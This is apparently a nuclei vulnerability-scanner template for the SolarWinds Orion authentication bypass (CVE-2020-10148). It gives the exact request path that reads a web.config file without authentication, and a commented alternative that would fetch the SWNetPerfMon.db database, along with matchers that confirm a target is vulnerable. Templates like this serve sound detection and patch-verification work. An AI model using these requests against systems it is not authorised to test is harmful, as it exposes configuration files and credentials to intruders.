nuclei-templates/cves/CVE-2020-10148.yaml

48 lines
1.3 KiB
YAML

id: cve-2020-10148
info:
name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
author: dwisiswant0
severity: high
description: |
This template could allow to bypass authentication and execute API
commands which may result in a compromise of the SolarWinds instance.
# References:
# - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
# - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
# - https://kb.cert.org/vuls/id/843464
# - https://twitter.com/0xsha/status/1343800953946787847
requests:
- method: GET
path:
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
matchers-condition: and
matchers:
- type: word
words:
- "SolarWinds.Orion.Core."
part: body
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200
# - type: word
# words:
# - "Connection String"
# - "text/plain"
# part: all
# condtion: and
#
# Commented matchers can be used for "SWNetPerfMon.db" file.